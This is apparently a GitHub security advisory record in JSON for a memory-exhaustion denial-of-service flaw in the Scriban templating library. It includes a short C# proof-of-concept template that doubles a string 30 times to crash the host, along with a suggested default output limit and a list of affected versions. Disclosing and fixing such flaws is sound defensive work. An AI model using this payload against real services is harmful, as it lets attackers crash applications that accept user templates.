{"id":"GHSA-5rpf-x9jg-8j5p","summary":"Scriban Affected by Memory Exhaustion (OOM) via Unbounded String Generation (Denial of Service)","details":"`TemplateContext.LimitToString` defaults to `0` (unlimited). While Scriban implements a default `LoopLimit` of 1000, an attacker can still cause massive memory allocation via exponential string growth. Doubling a string for just 30 iterations generates over 1GB of text, instantly exhausting heap memory and crashing the host process. Because no output size limit is enforced, repeated string concatenation results in exponential memory growth.\n\n**Proof of Concept (PoC):**\nThe following payload executes in under 30 iterations but results in ~1GB string allocation, crashing the process.\n\n```csharp\nusing Scriban;\n\nstring maliciousTemplate =\n    @\"\n        {{\n            a = \"\"A\"\"\n            for i in 1..30\n                a = a + a\n            end\n            a\n        }}\";\n\nvar template = Template.Parse(maliciousTemplate);\n\nvar context = new TemplateContext();\n\ntry\n{\n    template.Render(context);\n}\ncatch (Exception ex)\n{\n    Console.WriteLine(\"\\nException: \" + ex.Message);\n}\n```\n\n**Impact:**\nAn attacker can supply a small template that triggers exponential string growth, forcing the application to allocate excessive memory. This leads to severe memory pressure, garbage collection thrashing, and eventual process termination (DoS).\n\n**Suggested Fix:**\nEnforce a sensible default limit for string output. Set default `LimitToString` to 1MB (1,048,576 characters). \n\n```csharp\npublic int LimitToString { get; set; } = 1048576; \n```","modified":"2026-03-19T21:46:33.359720Z","published":"2026-03-19T21:31:10Z","database_specific":{"severity":"MODERATE","github_reviewed_at":"2026-03-19T21:31:10Z","nvd_published_at":null,"cwe_ids":["CWE-770"],"github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/scriban/scriban/security/advisories/GHSA-5rpf-x9jg-8j5p"},{"type":"WEB","url":"https://github.com/scriban/scriban/commit/a6fe6074199e5c04f4d29dc8d8e652b24d33e3e4"},{"type":"PACKAGE","url":"https://github.com/scriban/scriban"}],"affected":[{"package":{"name":"scriban","ecosystem":"NuGet","purl":"pkg:nuget/scriban"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"6.6.0"}]}],"versions":["0.1.0","0.10.0","0.11.0","0.12.0","0.12.1","0.13.0","0.14.0","0.15.0","0.16.0","0.2.0","0.2.1","0.2.2","0.3.0","0.3.1","0.3.1-pre028","0.4.0","0.5.0","0.6.0","0.7.0","0.9.0","0.9.0-pre100","0.9.1","1.0.0","1.0.0-beta-001","1.0.0-beta-002","1.0.0-beta-003","1.0.0-beta-004","1.0.0-beta-005","1.0.0-beta-006","1.1.0","1.1.1","1.2.0","1.2.1","1.2.2","1.2.3","1.2.4","1.2.5","1.2.6","1.2.7","1.2.8","1.2.9","2.0.0","2.0.0-alpha-001","2.0.0-alpha-002","2.0.0-alpha-003","2.0.0-alpha-004","2.0.0-alpha-005","2.0.0-alpha-006","2.0.1","2.1.0","2.1.1","2.1.2","2.1.3","2.1.4","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.1.0","3.2.0","3.2.1","3.2.2","3.3.0","3.3.1","3.3.2","3.3.3","3.4.0","3.4.1","3.4.2","3.5.0","3.6.0","3.7.0","3.8.0","3.8.1","3.8.2","3.9.0","4.0.0","4.0.1","4.0.2","4.1.0","5.0.0","5.1.0","5.10.0","5.11.0","5.12.0","5.12.1","5.2.0","5.3.0","5.4.0","5.4.1","5.4.2","5.4.3","5.4.4","5.4.5","5.4.6","5.5.0","5.5.1","5.5.2","5.6.0","5.7.0","5.8.0","5.9.0","5.9.1","6.0.0","6.1.0","6.2.0","6.2.1","6.3.0","6.4.0","6.5.0","6.5.1","6.5.2","6.5.3","6.5.4","6.5.5","6.5.6","6.5.7","6.5.8"],"database_specific":{"last_known_affected_version_range":"\u003c= 6.5.8","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-5rpf-x9jg-8j5p/GHSA-5rpf-x9jg-8j5p.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}